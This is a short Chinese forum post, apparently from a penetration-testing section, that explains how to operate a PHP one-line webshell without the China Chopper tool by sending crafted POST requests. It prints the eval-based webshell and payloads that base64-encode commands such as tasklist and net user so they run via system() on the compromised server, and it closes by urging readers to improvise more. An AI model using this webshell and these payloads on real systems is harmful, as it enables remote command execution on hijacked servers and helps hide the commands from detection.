一句话脱离菜刀执行命令

2016-03-28 09:37:17 36 9233 1


是否还在当心菜刀有后门导致webshell被盗?一句话就一定要在菜刀里使用?当然不是,我们完全可以模拟post包来实现一句话的执行,方法如下:
1.假设一句话为:<?php eval($_POST[cmd])?>
2.执行phpinfo()时post提交:cmd=phpinfo();



执行tasklist时,post提交:cmd=$a=dGFza2xpc3Q;$b=base64_decode($a);system($b);    (其中dGFza2xpc3Q为tasklist的base64编码,注意要删除后面的等号)



执行net user时,post提交:cmd=$a=bmV0IHVzZXI;$b=base64_decode($a);system($b);



3.其它的请自由发挥!!!
TCV=1
类别 渗透测试

关于作者

loversorry22篇文章574篇回复

loversorry
36

评论36次

要评论?请先  登录  或  注册